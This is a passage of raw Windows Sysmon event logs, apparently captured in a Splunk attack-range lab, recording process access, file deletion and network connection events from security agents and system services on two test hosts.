Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF4-63C7-A104-00000000AF02}4952C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A626190) 10341000x800000000000000045094Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:54.747{FE4C2B44-DE08-63C7-F104-00000000AF02}60686508C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA7E-63C7-F900-00000000AF02}4844C:\Windows\System32\msdtc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A626190) 10341000x800000000000000045093Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:54.745{FE4C2B44-DE08-63C7-F104-00000000AF02}60686508C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA75-63C7-F400-00000000AF02}2900C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A626190) 10341000x800000000000000045092Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:54.743{FE4C2B44-DE08-63C7-F104-00000000AF02}60686508C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A626190) 10341000x800000000000000045091Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:54.742{FE4C2B44-DE08-63C7-F104-00000000AF02}60686508C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA67-63C7-AE00-00000000AF02}4912C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A626190) 10341000x800000000000000045090Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:54.739{FE4C2B44-DE08-63C7-F104-00000000AF02}60686508C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A626190) 10341000x800000000000000045089Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:54.738{FE4C2B44-DE08-63C7-F104-00000000AF02}60686508C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA1C-63C7-7500-00000000AF02}3048C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A626190) 10341000x800000000000000045088Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:54.737{FE4C2B44-DE08-63C7-F104-00000000AF02}60686508C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA1C-63C7-7400-00000000AF02}3024C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A626190) 10341000x800000000000000045087Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:54.736{FE4C2B44-DE08-63C7-F104-00000000AF02}60686508C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA05-63C7-3E00-00000000AF02}3580C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A626190) 10341000x800000000000000045086Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:54.734{FE4C2B44-DE08-63C7-F104-00000000AF02}60686508C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA05-63C7-3B00-00000000AF02}3500C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A626190) 23542300x800000000000000045085Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:54.561{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=05836F2620AAA2F4C66FDDD2207D6EB1,SHA256=0A4E82FA09B7B868D3051FD2A27080883933844D30D170A7C4C9199E8F9DB6A6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000045084Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:54.216{FE4C2B44-DE08-63C7-F104-00000000AF02}60686508C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2C00-00000000AF02}1648C:\Windows\System32\vds.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A626190) 10341000x800000000000000045083Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:54.215{FE4C2B44-DE08-63C7-F104-00000000AF02}60686508C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2A00-00000000AF02}2844C:\Windows\system32\wbem\unsecapp.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A626190) 10341000x800000000000000045082Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:54.205{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045081Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:54.205{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045080Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:54.205{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-D9F5-63C7-1600-00000000AF02}1296C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\lsasrv.dll+1bfed|C:\Windows\system32\lsasrv.dll+28fbb|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045079Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:54.188{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DE08-63C7-F104-00000000AF02}6068C:\Program Files\Aurora-Agent\aurora-agent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+3f936|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x800000000000000045078Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:51.582{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56411-false10.0.1.12-8000- 23542300x800000000000000045113Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:55.974{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DA77A582CAEF25072E9FA9D340A86C49,SHA256=EE10E46865D1843AEFD9659DB9AAE7062D16B63C1B9A6CBD7D38178C2E96C9CA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000045112Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:55.651{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5AD98EDB684BBD4F650F07994EA7DD0D,SHA256=678A1EBCC188981C7F8A6C18DE98DAAEF5275C0BA708598AC28291145DEE0385,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000045111Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:55.635{FE4C2B44-E326-63C7-F905-00000000AF02}3260ATTACKRANGE\AdministratorC:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeC:\ProgramData\Foxit Software\Foxit PDF Reader\FoxitSensor\Sensor.db-journalMD5=6A65841963ACC3EC7EEF6E84012EAF4E,SHA256=2F0E4E96A624D07BF6CFEA66B76ED89625CE027168D473352489F7BD69DB97AE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000017565Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:53.010{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50141-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 23542300x800000000000000017564Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:55.574{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E6E3610A635A518F0318FB26C5D92DC3,SHA256=80362C6CA67A0310801FB831BE30104F8515649564515A25E36902B0B5E99ABF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000045114Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:56.736{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F499687719333F459054B394D6D40B74,SHA256=0D659EEED19D2736F714A06805EF0F3C7315351AECC9A728110126A11B7A670A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000017566Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:56.658{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=70EF8FC59050B7C128DAA1AB122087E0,SHA256=25355461019ACCFCCDD8C5EF0103B62AC4EDA8AEEC346BCF3AED31028BC5BA1E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000045117Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:57.827{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6C724C9AEE149E902B844BFE72344181,SHA256=E81007265C1689E5BA1F26306517CFA389BDE7F4EFEAD77FA26E6EDB9DEAE711,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000017567Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:57.725{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E4CCF8E44FE3849901C38C5FAEE03676,SHA256=EFF70AADBAB1825430FA6E4ED936226EDE32AD7BBC80DBC568BFC6A04E0AD2DC,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000045116Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:54.355{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local56412-true0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local389ldap 354300x800000000000000045115Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:54.354{FE4C2B44-DA03-63C7-1F00-00000000AF02}2444C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local56412-true0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local389ldap 23542300x800000000000000045118Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:58.920{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CAE9729816383C07C885CDB383B44222,SHA256=1D3C1D67FF3002B1D9311A99A2EE4AC866F3957A6C93C4258E1269750D6065A6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000017568Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:58.811{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4817C885E9CD10B08CEE9EA052935231,SHA256=590137CBF2DDD2E72C3584F106F1B1387BE6E966975EF547E5BB6ECB51893543,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000017569Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:59.905{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F305F4DDF9470E5FE68123CC5FC16C7C,SHA256=7D3B8887713F016676C0DC0BA959F45365CD25FBF66000A8CAFF54065E2F1B83,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000017571Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:00.996{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=246005299D56405E1B5DD4ED8360C197,SHA256=71D356CF076BB581ACAB9DAB53E10C6509674557E6570E796243A8E5028140F5,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000017570Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:59.002{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50142-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 354300x800000000000000045121Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:57.506{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56413-false10.0.1.12-8000- 23542300x800000000000000045120Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:00.533{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\spool\splunk\tracker.logMD5=6616710F41A530697AB0FD7C623BB6E9,SHA256=EED9660AACA503483A3522267EDCAD33BC31C6E936F2114E9E079A15A2A8127A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000045119Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:00.017{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D3ACCECBAB0882AE191066BB38337A1F,SHA256=C87B45E5A6DE9D4D0E2F42F03E7FA673D04875BAA923D38EEA29AB2E637F6BF3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000017573Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:01.965{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4E004C3A519A46498D606B0E46FF7A15,SHA256=F253EA2E3589F6B8C440B1D9B4D4EE2F23A2F0FB0BA81960B449BA56EA2FA097,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000045122Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:01.113{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BD50CF70C5EB7990A795BDD746181DDB,SHA256=F5253CE76D349BB4CF2E7418CAE134F668AF130041DC294CEA61E7DB7F6F68BF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000017572Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:01.231{E5A8D418-DCC0-63C7-9F00-00000000B002}3096NT AUTHORITY\SYSTEMC:\Program 